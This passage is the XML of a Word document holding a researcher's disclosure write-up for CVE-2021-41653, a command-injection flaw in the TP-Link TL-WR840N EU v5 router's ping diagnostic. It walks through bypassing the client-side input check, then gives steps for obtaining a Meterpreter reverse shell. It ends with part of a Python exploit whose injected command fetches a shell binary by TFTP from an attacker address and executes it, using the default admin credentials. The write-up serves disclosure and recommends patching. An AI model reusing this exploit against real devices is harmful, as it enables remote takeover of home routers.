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951C7" w14:textId="28DB29A1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/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002272C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TP-Link TL-WR840N EU v5 Remote Code Execution</w:t>
      </w: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/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002272C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val="en-US"/>
        </w:rPr>
        <w:t>CVE-2021-41653</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B30832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#TPLINK, #rce, #exploit, #CVE, #vulnerability, #router, #routerhacking, #kpmghungary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E5C40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Last Modified: 2021.11.12.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0935E748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2272C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Introduction </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F67B83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goal was to achieve remote code execution on a TP-LINK TL-WR840N EU (V5) router. According to its papers, this version came out in 2017. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ED3FEF" w14:textId="20894939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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/01.jpg"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61F1A5" wp14:editId="498C258C">
            <wp:extent cx="5943600" cy="4457700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture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  <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Model:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> TP-Link TL-WR840N EU v5 </w:t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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> There are newer hardware versions 6.0 and 6.20. </w:t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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerable Firmware version:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> TL-WR840N(EU)_V5_171211 / 0.9.1 3.16 v0001.0 Build 171211 Rel.58800n </w:t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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/02.png"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C800761" wp14:editId="3FE49EC2">
            <wp:extent cx="5943600" cy="1616710"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="Picture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  <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Authentication required:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> Yes </w:t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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>LAN exploit:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> Yes </w:t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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>POC:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> Yes </w:t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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Reverse shell obtained:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> Yes </w:t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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Patch is available:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> Yes </w:t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color w:val="24292E"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BA8AAB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FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>I highly recommend upgrading the firmware to the latest version "TL-WR840N(EU)_V5_211109". It can be downloaded from the vendor homepage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3066899B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I would like to say thank you to the TP-Link Security Team.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B9BDB9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2272C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Additional Notes: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B047D0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I found a similar vulnerability on the TPLINK TL-WR840N v4 hardware, but it is different. It is related to the </w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Traceroute</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>function and telnet is available on that case. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBFB5BA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relevant CVE is the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB7F22" w14:textId="77777777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hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="002272CE">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2019-15060</w:t>
        </w:r>
      </w:hyperlink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color w:val="24292E"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3438F7AB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There is another vulnerability on the TPLINK TL-WR840N v6 version that vulnerability is also an input validation problem, but it is not related to the diagnostic page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08823D6E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More information can be found here: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077B646E" w14:textId="77777777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hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="002272CE">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0366D6"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2020-36178</w:t>
        </w:r>
      </w:hyperlink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color w:val="24292E"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C87DAB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I tested the vulnerability with a v6.20 device and it is not vulnerable. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D89DB51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2272C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Technical Details </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF963C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272CE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Easy root via UART </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47232D2D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I used my FT232 device to obtain root access to the device. This console was really useful during exploit development. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B88E5B9" w14:textId="275E7038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Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w: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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/03.png"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A7F62C" wp14:editId="13E73163">
            <wp:extent cx="5943600" cy="7988300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16" name="Picture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3DE1C3E6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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1925124B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# check serial port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3B8284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  <w:t>screen /dev/tty.usbserial-AB0LR7NH 115200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0ACF6F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ab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C481C2" w14:textId="256FAFE2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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/04.png"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9BB8F8" wp14:editId="61AF8434">
            <wp:extent cx="5943600" cy="6542405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="Picture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2EB2BE4D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I used the UART console for debugging only and it is not necessary to exploit the vulnerability. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B6D1C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272CE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The vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D59C8B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lastRenderedPageBreak/>
        <w:t>The following screenshot contains the relevant input parameter on the GUI. The user-provided input parameter is not sanitized on the server-side and it is used to execute a PING command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E36460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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> The WAN cable must be plugged in. The router IP Address is 192.168.1.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E95A9" w14:textId="61F22124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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/05.png"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513EAC5" wp14:editId="163748D7">
            <wp:extent cx="5943600" cy="3906520"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="14" name="Picture 1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color w:val="24292E"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3810459E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vendor uses client-side JavaScript protection, but it can be bypassed easily with a proxy. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B9457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protection: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586B48E" w14:textId="6B7E62FA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lastRenderedPageBreak/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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/06.png"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82257E5" wp14:editId="00FC5610">
            <wp:extent cx="5943600" cy="3107690"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="13" name="Picture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  <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC99B73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exact command is visible on the serial console when the command is executed. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005D9240" w14:textId="23BE3A2F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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/22.png"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89294E1" wp14:editId="21931CA2">
            <wp:extent cx="5943600" cy="658495"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="12" name="Picture 12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20C06450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Of course, I used ghidra and other reverse engineering tools to check what is happening, but now it is enough the parameters are not sanitized on the server-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD51A59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To execute code on the router, the following two requests must be sent: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D607C8E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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> There are other requests, but they are not mandatory to achieve code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79974493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Request 1 (the host parameter is vulnerable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2EB84F" w14:textId="2DDBA2EA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lastRenderedPageBreak/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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/07.png"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A66476B" wp14:editId="11C0D5ED">
            <wp:extent cx="5943600" cy="2433320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="11" name="Picture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0A6180C0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Request 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5994F541" w14:textId="109667B6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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/08.png"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CE98E1" wp14:editId="24273E86">
            <wp:extent cx="5943600" cy="2143125"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="10" name="Picture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42919E99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272CE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Simple Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E2135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following picture contains the content of the /var/tmp folder (via UART). This folder is writeable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCCCEFC" w14:textId="0AC1C19C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lastRenderedPageBreak/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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/09.png"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CBD4BD" wp14:editId="39FBC502">
            <wp:extent cx="5943600" cy="1958975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="Picture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  <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="082D867F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host parameter modified to create a file: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558D6DCF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Request 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA7677" w14:textId="1AC41A49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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/10.png"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AD512B" wp14:editId="59047332">
            <wp:extent cx="5943600" cy="2433320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="8" name="Picture 8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655F8C05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Request 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8B7F06" w14:textId="36FDF5A8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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/11.png"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20FB7DC" wp14:editId="4B41D10E">
            <wp:extent cx="5943600" cy="2090420"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="7" name="Picture 7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0B94CF8A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/var/tmp/k44 file content is the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EAAA1C" w14:textId="1236523F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lastRenderedPageBreak/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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/12.png"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0D5993" wp14:editId="2CB761F9">
            <wp:extent cx="5943600" cy="1710055"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="6" name="Picture 6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538CF13A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272CE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Reverse shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610F1DFA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vendor provided programs are limited. For a successful attack multiple steps are necessary. The TFTP client can be used to copy files from the attacker to the router. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFDECD8" w14:textId="0BD4F569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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/13.png"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323065" wp14:editId="3FBB345F">
            <wp:extent cx="5943600" cy="4833620"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="5" name="Picture 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7773D8F5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b/>
          <w:bCs/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="24292E"/>
        </w:rPr>
        <w:t>The username and password are necessary. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32571B93" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1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lastRenderedPageBreak/>
        <w:t>Generate meterpreter shell (IP, PORT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C9B7E2" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE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Prepare the TFTP server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA03F02" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE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Copy the shell to the TFTP server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619DE466" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE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Open Meterpreter listener </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150117F" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE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Send requests to the router </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BBF2F3" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE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Download the shell via TFTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00644EDE" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Execute the binary and connect back to the attacker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23323999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The important part of the code execution does the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D856BB" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1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Upload the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E843C57" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Change permission of the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320BD1D6" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Execute the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7DDEE1" w14:textId="5E1DA74A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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/14.png"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F778449" wp14:editId="0B0F1ECF">
            <wp:extent cx="5943600" cy="196215"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Picture 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19DC12F1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272CE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POC + DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACF59AE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Notes: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB02F8A" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1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I used my standard kali vm and the msfvenom tool to generate a reverse shell binary. The architecture is MIPSLE. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551CBE56" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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I used atfpd server as a TFTP server </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ABED729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Use multi handler:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16512BA5" w14:textId="3B8351BE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lastRenderedPageBreak/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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/15.png"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71AA616" wp14:editId="49AAE0EA">
            <wp:extent cx="5943600" cy="4013200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="Picture 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4304140F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Execute the script: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E82695B" w14:textId="2286AEF4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"/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/16.png"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624AFE" wp14:editId="738DD08D">
            <wp:extent cx="5943600" cy="2894330"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="2" name="Picture 2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3C107CBC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Reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E065F" w14:textId="0A72ACF3" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "/var/folders/_l/pnb2t_9s0f192bqlz1348vpr0000gn/T/com.microsoft.Word/WebArchiveCopyPasteTempFiles/17.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002272CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="002272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9E3EA88" wp14:editId="18D3A521">
            <wp:extent cx="5943600" cy="1918335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 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2CE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66974EB0" w14:textId="77777777" w:rsidR="002272CE" w:rsidRPr="002272CE" w:rsidRDefault="002272CE" w:rsidP="002272CE">
      <w:pPr>
        <w:spacing w:after="240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POC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B2B085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432ABE73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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D91D57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###############################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79476B18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### tplink_TL-WR840N-EU-v5-rce-exploit_v1.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4656A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### Version: 1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C136A5A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### Author: Matek Kamillo (k4m1ll0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3C62C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### Email: matek.kamillo@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60369120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### Date: 2021.09.06.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286A5E4E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##############################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B09C79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796F8207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import requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DC4FF6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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF46F4D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import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5EBC22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0064320E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USERNAME = "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE1046D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PASSWORD = "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39738C10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URL = "http://192.168.1.1/cgi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D10819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PATH = "/srv/tftp/shell"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E306919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ATTACKER_IP = "192.168.1.101"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C9887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COMMAND = "$(echo 127.0.0.1; tftp -g -r shell -l /var/tmp/shell " + ATTACKER_IP + "; chmod +x /var/tmp/shell; /var/tmp/shell)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B478F1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3B907FCE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def base64_encode(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3183DBE7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msg_bytes = s.encode('ascii')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A97ED22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return base64.b64encode(msg_bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170FE61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06DB9E97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325FC80B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class Exploit(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8A28E3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def __init__(self, username, password, command):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124F4C9B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self.username = username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073A9C5F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self.password = password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8D959E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self.command = command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B1B593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648FA6E3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self.URL = "http://192.168.1.1/cgi"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76022E2D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self.session = requests.session()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB25AC6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#self.proxies = { 'http' : 'http://192.168.1.100:8080'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71514374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self.proxies = { }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5595BE10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self.cookies = { 'Authorization' : 'Basic ' + base64_encode(username + ":" + password).decode('ascii') }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA94EA4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        self.headers = { 'Content-Type': 'text/plain', 'Referer' : 'http://192.168.1.1/mainFrame.htm' }</w:t>
